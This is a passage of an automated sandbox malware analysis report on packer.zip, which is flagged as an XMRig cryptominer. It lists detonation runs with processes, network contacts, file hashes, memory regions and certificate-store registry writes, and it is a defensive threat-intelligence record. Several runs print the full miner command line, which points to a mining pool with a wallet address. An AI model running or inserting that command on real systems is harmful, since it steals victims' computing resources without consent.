Malware Analysis Report

2025-04-19 17:31

Sample ID 240523-tltb3sgg73
Target packer.zip
SHA256 2712cfc84e57a8c2c3637bc69d65c1741fcb7a600c78709bbe3d47c5f76a4293
Tags
xmrig miner
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral15

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral18

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral5

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral8

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral13

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral16

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral9

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral12

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral14

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral19

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral20

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral6

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral7

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral10

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral17

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral11

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

2712cfc84e57a8c2c3637bc69d65c1741fcb7a600c78709bbe3d47c5f76a4293

Threat Level: Known bad

The file packer.zip was found to be: Known bad.

Malicious Activity Summary

xmrig miner

XMRig Miner payload

xmrig

Executes dropped EXE

Unsigned PE

Suspicious use of AdjustPrivilegeToken

Suspicious use of FindShellTrayWindow

Modifies system certificate store

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-23 16:09

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral15

Detonation Overview

Submitted

2024-05-23 16:09

Reported

2024-05-23 22:07

Platform

win10v2004-20240508-en

Max time kernel

1792s

Max time network

1803s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 23.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 95.179.241.203:80 pool.hashvault.pro tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 203.241.179.95.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 18.24.18.2.in-addr.arpa udp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 25.24.18.2.in-addr.arpa udp
US 8.8.8.8:53 18.173.189.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

MD5 e2fe87cc2c7dab8ca6516620dccd1381
SHA1 f714ec0448325435103519452610cf7aadf8bbba
SHA256 d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4
SHA512 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6

memory/3976-16-0x000001251E600000-0x000001251E620000-memory.dmp

memory/3976-17-0x000001251FF10000-0x000001251FF30000-memory.dmp

memory/3976-18-0x00007FF78F600000-0x00007FF790103000-memory.dmp

memory/3976-21-0x000001251FF50000-0x000001251FF70000-memory.dmp

memory/3976-20-0x000001251FF30000-0x000001251FF50000-memory.dmp

memory/3976-19-0x00007FF78F600000-0x00007FF790103000-memory.dmp

memory/3976-22-0x00007FF78F600000-0x00007FF790103000-memory.dmp

memory/3976-23-0x00007FF78F600000-0x00007FF790103000-memory.dmp

memory/3976-25-0x000001251FF50000-0x000001251FF70000-memory.dmp

memory/3976-24-0x000001251FF30000-0x000001251FF50000-memory.dmp

memory/3976-26-0x00007FF78F600000-0x00007FF790103000-memory.dmp

memory/3976-27-0x00007FF78F600000-0x00007FF790103000-memory.dmp

memory/3976-28-0x00007FF78F600000-0x00007FF790103000-memory.dmp

memory/3976-29-0x00007FF78F600000-0x00007FF790103000-memory.dmp

memory/3976-30-0x00007FF78F600000-0x00007FF790103000-memory.dmp

memory/3976-31-0x00007FF78F600000-0x00007FF790103000-memory.dmp

memory/3976-32-0x00007FF78F600000-0x00007FF790103000-memory.dmp

memory/3976-33-0x00007FF78F600000-0x00007FF790103000-memory.dmp

memory/3976-34-0x00007FF78F600000-0x00007FF790103000-memory.dmp

memory/3976-35-0x00007FF78F600000-0x00007FF790103000-memory.dmp

memory/3976-36-0x00007FF78F600000-0x00007FF790103000-memory.dmp

memory/3976-37-0x00007FF78F600000-0x00007FF790103000-memory.dmp

memory/3976-38-0x00007FF78F600000-0x00007FF790103000-memory.dmp

memory/3976-39-0x00007FF78F600000-0x00007FF790103000-memory.dmp

memory/3976-40-0x00007FF78F600000-0x00007FF790103000-memory.dmp

memory/3976-41-0x00007FF78F600000-0x00007FF790103000-memory.dmp

memory/3976-42-0x00007FF78F600000-0x00007FF790103000-memory.dmp

memory/3976-43-0x00007FF78F600000-0x00007FF790103000-memory.dmp

memory/3976-44-0x00007FF78F600000-0x00007FF790103000-memory.dmp

memory/3976-45-0x00007FF78F600000-0x00007FF790103000-memory.dmp

memory/3976-46-0x00007FF78F600000-0x00007FF790103000-memory.dmp

memory/3976-47-0x00007FF78F600000-0x00007FF790103000-memory.dmp

memory/3976-48-0x00007FF78F600000-0x00007FF790103000-memory.dmp

memory/3976-49-0x00007FF78F600000-0x00007FF790103000-memory.dmp

memory/3976-50-0x00007FF78F600000-0x00007FF790103000-memory.dmp

memory/3976-51-0x00007FF78F600000-0x00007FF790103000-memory.dmp

memory/3976-52-0x00007FF78F600000-0x00007FF790103000-memory.dmp

memory/3976-53-0x00007FF78F600000-0x00007FF790103000-memory.dmp

memory/3976-54-0x00007FF78F600000-0x00007FF790103000-memory.dmp

memory/3976-55-0x00007FF78F600000-0x00007FF790103000-memory.dmp

memory/3976-56-0x00007FF78F600000-0x00007FF790103000-memory.dmp

memory/3976-57-0x00007FF78F600000-0x00007FF790103000-memory.dmp

memory/3976-58-0x00007FF78F600000-0x00007FF790103000-memory.dmp

memory/3976-59-0x00007FF78F600000-0x00007FF790103000-memory.dmp

memory/3976-60-0x00007FF78F600000-0x00007FF790103000-memory.dmp

memory/3976-61-0x00007FF78F600000-0x00007FF790103000-memory.dmp

memory/3976-62-0x00007FF78F600000-0x00007FF790103000-memory.dmp

memory/3976-63-0x00007FF78F600000-0x00007FF790103000-memory.dmp

memory/3976-64-0x00007FF78F600000-0x00007FF790103000-memory.dmp

memory/3976-65-0x00007FF78F600000-0x00007FF790103000-memory.dmp

memory/3976-66-0x00007FF78F600000-0x00007FF790103000-memory.dmp

memory/3976-67-0x00007FF78F600000-0x00007FF790103000-memory.dmp

memory/3976-68-0x00007FF78F600000-0x00007FF790103000-memory.dmp

memory/3976-69-0x00007FF78F600000-0x00007FF790103000-memory.dmp

memory/3976-70-0x00007FF78F600000-0x00007FF790103000-memory.dmp

memory/3976-71-0x00007FF78F600000-0x00007FF790103000-memory.dmp

memory/3976-72-0x00007FF78F600000-0x00007FF790103000-memory.dmp

memory/3976-73-0x00007FF78F600000-0x00007FF790103000-memory.dmp

memory/3976-74-0x00007FF78F600000-0x00007FF790103000-memory.dmp

memory/3976-75-0x00007FF78F600000-0x00007FF790103000-memory.dmp

memory/3976-76-0x00007FF78F600000-0x00007FF790103000-memory.dmp

memory/3976-77-0x00007FF78F600000-0x00007FF790103000-memory.dmp

memory/3976-78-0x00007FF78F600000-0x00007FF790103000-memory.dmp

memory/3976-79-0x00007FF78F600000-0x00007FF790103000-memory.dmp

memory/3976-80-0x00007FF78F600000-0x00007FF790103000-memory.dmp

memory/3976-81-0x00007FF78F600000-0x00007FF790103000-memory.dmp

memory/3976-82-0x00007FF78F600000-0x00007FF790103000-memory.dmp

memory/3976-83-0x00007FF78F600000-0x00007FF790103000-memory.dmp

memory/3976-84-0x00007FF78F600000-0x00007FF790103000-memory.dmp

Analysis: behavioral18

Detonation Overview

Submitted

2024-05-23 16:09

Reported

2024-05-23 22:10

Platform

win10v2004-20240508-en

Max time kernel

1794s

Max time network

1797s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy - Copy.exe"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy - Copy.exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy - Copy.exe"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 25.24.18.2.in-addr.arpa udp
US 8.8.8.8:53 72.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
NL 23.62.61.137:443 www.bing.com tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 137.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 95.179.241.203:80 pool.hashvault.pro tcp
US 8.8.8.8:53 203.241.179.95.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 18.24.18.2.in-addr.arpa udp
US 8.8.8.8:53 23.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 14.173.189.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

MD5 e2fe87cc2c7dab8ca6516620dccd1381
SHA1 f714ec0448325435103519452610cf7aadf8bbba
SHA256 d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4
SHA512 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6

memory/3460-16-0x0000016416B90000-0x0000016416BB0000-memory.dmp

memory/3460-17-0x0000016416BE0000-0x0000016416C00000-memory.dmp

memory/3460-18-0x00007FF6690A0000-0x00007FF669BA3000-memory.dmp

memory/3460-20-0x0000016416C20000-0x0000016416C40000-memory.dmp

memory/3460-19-0x00007FF6690A0000-0x00007FF669BA3000-memory.dmp

memory/3460-21-0x0000016416C00000-0x0000016416C20000-memory.dmp

memory/3460-22-0x00007FF6690A0000-0x00007FF669BA3000-memory.dmp

memory/3460-23-0x00007FF6690A0000-0x00007FF669BA3000-memory.dmp

memory/3460-24-0x0000016416C20000-0x0000016416C40000-memory.dmp

memory/3460-25-0x0000016416C00000-0x0000016416C20000-memory.dmp

memory/3460-26-0x00007FF6690A0000-0x00007FF669BA3000-memory.dmp

memory/3460-27-0x00007FF6690A0000-0x00007FF669BA3000-memory.dmp

memory/3460-28-0x00007FF6690A0000-0x00007FF669BA3000-memory.dmp

memory/3460-29-0x00007FF6690A0000-0x00007FF669BA3000-memory.dmp

memory/3460-30-0x00007FF6690A0000-0x00007FF669BA3000-memory.dmp

memory/3460-31-0x00007FF6690A0000-0x00007FF669BA3000-memory.dmp

memory/3460-32-0x00007FF6690A0000-0x00007FF669BA3000-memory.dmp

memory/3460-33-0x00007FF6690A0000-0x00007FF669BA3000-memory.dmp

memory/3460-34-0x00007FF6690A0000-0x00007FF669BA3000-memory.dmp

memory/3460-35-0x00007FF6690A0000-0x00007FF669BA3000-memory.dmp

memory/3460-36-0x00007FF6690A0000-0x00007FF669BA3000-memory.dmp

memory/3460-37-0x00007FF6690A0000-0x00007FF669BA3000-memory.dmp

memory/3460-38-0x00007FF6690A0000-0x00007FF669BA3000-memory.dmp

memory/3460-39-0x00007FF6690A0000-0x00007FF669BA3000-memory.dmp

memory/3460-40-0x00007FF6690A0000-0x00007FF669BA3000-memory.dmp

memory/3460-41-0x00007FF6690A0000-0x00007FF669BA3000-memory.dmp

memory/3460-42-0x00007FF6690A0000-0x00007FF669BA3000-memory.dmp

memory/3460-43-0x00007FF6690A0000-0x00007FF669BA3000-memory.dmp

memory/3460-44-0x00007FF6690A0000-0x00007FF669BA3000-memory.dmp

memory/3460-45-0x00007FF6690A0000-0x00007FF669BA3000-memory.dmp

memory/3460-46-0x00007FF6690A0000-0x00007FF669BA3000-memory.dmp

memory/3460-47-0x00007FF6690A0000-0x00007FF669BA3000-memory.dmp

memory/3460-48-0x00007FF6690A0000-0x00007FF669BA3000-memory.dmp

memory/3460-49-0x00007FF6690A0000-0x00007FF669BA3000-memory.dmp

memory/3460-50-0x00007FF6690A0000-0x00007FF669BA3000-memory.dmp

memory/3460-51-0x00007FF6690A0000-0x00007FF669BA3000-memory.dmp

memory/3460-52-0x00007FF6690A0000-0x00007FF669BA3000-memory.dmp

memory/3460-53-0x00007FF6690A0000-0x00007FF669BA3000-memory.dmp

memory/3460-54-0x00007FF6690A0000-0x00007FF669BA3000-memory.dmp

memory/3460-55-0x00007FF6690A0000-0x00007FF669BA3000-memory.dmp

memory/3460-56-0x00007FF6690A0000-0x00007FF669BA3000-memory.dmp

memory/3460-57-0x00007FF6690A0000-0x00007FF669BA3000-memory.dmp

memory/3460-58-0x00007FF6690A0000-0x00007FF669BA3000-memory.dmp

memory/3460-59-0x00007FF6690A0000-0x00007FF669BA3000-memory.dmp

memory/3460-60-0x00007FF6690A0000-0x00007FF669BA3000-memory.dmp

memory/3460-61-0x00007FF6690A0000-0x00007FF669BA3000-memory.dmp

memory/3460-62-0x00007FF6690A0000-0x00007FF669BA3000-memory.dmp

memory/3460-63-0x00007FF6690A0000-0x00007FF669BA3000-memory.dmp

memory/3460-64-0x00007FF6690A0000-0x00007FF669BA3000-memory.dmp

memory/3460-65-0x00007FF6690A0000-0x00007FF669BA3000-memory.dmp

memory/3460-66-0x00007FF6690A0000-0x00007FF669BA3000-memory.dmp

memory/3460-67-0x00007FF6690A0000-0x00007FF669BA3000-memory.dmp

memory/3460-68-0x00007FF6690A0000-0x00007FF669BA3000-memory.dmp

memory/3460-69-0x00007FF6690A0000-0x00007FF669BA3000-memory.dmp

memory/3460-70-0x00007FF6690A0000-0x00007FF669BA3000-memory.dmp

memory/3460-71-0x00007FF6690A0000-0x00007FF669BA3000-memory.dmp

memory/3460-72-0x00007FF6690A0000-0x00007FF669BA3000-memory.dmp

memory/3460-73-0x00007FF6690A0000-0x00007FF669BA3000-memory.dmp

memory/3460-74-0x00007FF6690A0000-0x00007FF669BA3000-memory.dmp

memory/3460-75-0x00007FF6690A0000-0x00007FF669BA3000-memory.dmp

memory/3460-76-0x00007FF6690A0000-0x00007FF669BA3000-memory.dmp

memory/3460-77-0x00007FF6690A0000-0x00007FF669BA3000-memory.dmp

memory/3460-78-0x00007FF6690A0000-0x00007FF669BA3000-memory.dmp

memory/3460-79-0x00007FF6690A0000-0x00007FF669BA3000-memory.dmp

memory/3460-80-0x00007FF6690A0000-0x00007FF669BA3000-memory.dmp

memory/3460-81-0x00007FF6690A0000-0x00007FF669BA3000-memory.dmp

memory/3460-82-0x00007FF6690A0000-0x00007FF669BA3000-memory.dmp

memory/3460-83-0x00007FF6690A0000-0x00007FF669BA3000-memory.dmp

memory/3460-84-0x00007FF6690A0000-0x00007FF669BA3000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-23 16:09

Reported

2024-05-23 21:51

Platform

win10v2004-20240426-en

Max time kernel

1793s

Max time network

1807s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (10).exe"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\main - Copy (10).exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\main - Copy (10).exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e6